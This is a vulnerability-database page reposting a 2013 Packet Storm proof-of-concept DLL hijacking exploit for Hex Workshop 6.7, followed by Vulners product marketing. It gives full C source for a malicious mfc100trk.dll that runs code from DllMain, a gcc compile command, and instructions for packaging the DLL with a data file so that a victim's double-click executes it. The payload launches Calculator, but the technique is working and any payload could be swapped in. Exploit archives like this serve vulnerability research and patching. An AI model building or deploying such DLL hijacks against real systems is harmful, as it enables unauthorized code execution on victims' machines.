Lucene search
K

Hex Workshop 6.7 DLL Hijack

🗓️ 05 Dec 2013 00:00:00Reported by Akin TosunlarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 49 Views

Hex Workshop 6.7 DLL Hijack vulnerability, Allows unauthorized code executio

Code
`/* # Exploit Title: Hex Workshop v 6.7 (mfc100trk.dll) - DLL Hijacking Vulnerability  
// # Date: 29.11.2013  
// # Exploit Author: Akin Tosunlar / Ozgur Yurdusev  
// # Software Link: http://www.download.com/Hex-Workshop/3000-2352_4-10004918.html?part=dl-HexWorksh&subj=dl&tag=button  
// # Version: 6.7 (Probably old version of software and the LATEST version too)  
// # Vendor Homepage: http://www.bpsoft.com/  
// # Tested on: [ Windows XP sp3]  
// # Contact : [email protected]  
// #------------------  
// # Web Page : http://www.vigasis.com  
// #   
// # YOUTUBE EXPLOIT VIDEO: http://www.youtube.com/watch?v=yGGGabFNUiA&feature=youtu.be  
// #  
// # gcc -shared -o mfc100trk.dll evil.c  
// # Compile evil.c and rar or zip where you want the file extension (for ex: .byte) and mfc100trk.dll same folder. Associate Default Opener as Hex Workshop or OpenWith Hex Workshop.Double-click File. program start Calc.exe immediately.  
// #  
*/   
  
  
#include <windows.h>  
  
int evilcode()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
evilcode();  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation